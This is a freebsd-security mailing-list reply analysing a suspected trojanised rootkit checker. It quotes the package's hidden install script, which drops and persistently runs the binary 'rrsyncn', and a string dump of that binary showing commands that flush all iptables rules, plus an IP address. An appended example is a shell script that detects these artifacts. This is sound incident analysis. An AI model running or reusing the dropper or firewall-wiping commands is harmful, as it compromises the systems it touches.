Date: Wed, 25 Feb 2015 20:55:43 +0000
From: Christopher Schulte <christopher@schulte.org>
To: Philip Jocks <pjlists@netzkommune.com>
Cc: Joseph Mingrone <jrm@ftfl.ca>, "freebsd-security@freebsd.org" <freebsd-security@freebsd.org>
Subject: Re: has my 10.1-RELEASE system been compromised
Message-ID: <30A97E9B-5719-4DA3-ADFB-24A3FADF6D3C@schulte.org>
In-Reply-To: <4EE57C1F-AB10-4BF1-A193-DB9C75A586FC@netzkommune.com>
References: <864mq9zsmm.fsf@gly.ftfl.ca> <54EE2A19.7050108@FreeBSD.org> <86vbipycyc.fsf@gly.ftfl.ca> <1B20A559-59C5-477A-A2F3-9FD7E16C09E8@netzkommune.com> <86k2z5yc03.fsf@gly.ftfl.ca> <4EE57C1F-AB10-4BF1-A193-DB9C75A586FC@netzkommune.com>
> On Feb 25, 2015, at 2:34 PM, Philip Jocks <pjlists@netzkommune.com> wrote:
>
> it felt pretty scammy to me, googling for the "worm" got me to rkcheck.org which was registered a few days ago and looks like a tampered version of chkrootkit. I hope nobody installed it anywhere, it seems to execute rkcheck/tests/.unit/test.sh which contains
>
> #!/bin/bash
>
> cp tests/.unit/test /usr/bin/rrsyncn
> chmod +x /usr/bin/rrsyncn
> rm -fr /etc/rc2.d/S98rsyncn
> ln -s /usr/bin/rrsyncn /etc/rc2.d/S98rsyncn
> /usr/bin/rrsyncn
> exit
>
> That doesn't look like something you'd want on your box…

I filed a report with Google about that domain (Google Safe Browsing), briefly describing what's been recounted here on this thread.

It seems quite suspicious, agreed. Has anyone started an analysis of the rrsyncn binary? The last few lines of a simple string dump are interesting… take note of what looks to be an IP address of 95.215.44.195.

/bin/sh
iptables -X 2> /dev/null
iptables -F 2> /dev/null
iptables -t nat -F 2> /dev/null
iptables -t nat -X 2> /dev/null
iptables -t mangle -F 2> /dev/null
iptables -t mangle -X 2> /dev/null
iptables -P INPUT ACCEPT 2> /dev/null
iptables -P FORWARD ACCEPT 2> /dev/null
iptables -P OUTPUT ACCEPT 2> /dev/null
udevd
95.215.44.195
;*3$"

> Cheers,
>
> Philip

Chris
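Added example, not code from the thread or from rkcheck.org: a small POSIX sh check for the artifacts the quoted test.sh would leave behind (the dropped /usr/bin/rrsyncn and the /etc/rc2.d/S98rsyncn symlink) and for the IP address seen in the string dump. The function names, the ROOT prefix argument (so a mounted image or a test tree can be scanned instead of the live system) and the constructed sample tree are assumptions made for the example; the paths and the IP come from the messages above.

```shell
#!/bin/sh
# Indicator taken from the string dump quoted in the thread.
IOC_IP='95.215.44.195'

# scan_for_rrsyncn ROOT: print one FOUND line per artifact under ROOT.
# ROOT is "" for the live system, or the mount point of an image.
# Always returns 0; the caller counts the printed lines.
scan_for_rrsyncn() {
    root=${1:-}
    bin="$root/usr/bin/rrsyncn"
    link="$root/etc/rc2.d/S98rsyncn"
    if [ -e "$bin" ]; then
        echo "FOUND: dropped binary $bin"
        # grep -a scans the binary as text, -q only reports whether it matched.
        if grep -aq "$IOC_IP" "$bin"; then
            echo "FOUND: $bin contains string $IOC_IP"
        fi
    fi
    if [ -L "$link" ]; then
        # The quoted script creates exactly one level of symlink.
        echo "FOUND: startup symlink $link -> $(readlink "$link")"
    fi
    return 0
}

# Constructed sample tree (assumption): mimics what test.sh leaves behind,
# so the check can be exercised without an infected host.
make_sample_tree() {
    d=$(mktemp -d)
    mkdir -p "$d/usr/bin" "$d/etc/rc2.d"
    printf '\177ELF\nudevd %s ;*3$"\n' "$IOC_IP" > "$d/usr/bin/rrsyncn"
    ln -s /usr/bin/rrsyncn "$d/etc/rc2.d/S98rsyncn"
    echo "$d"
}

sample=$(make_sample_tree)
echo "== constructed sample tree =="
scan_for_rrsyncn "$sample"
rm -rf "$sample"
echo "== live system (no output means none of these artifacts exist) =="
scan_for_rrsyncn ""
```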
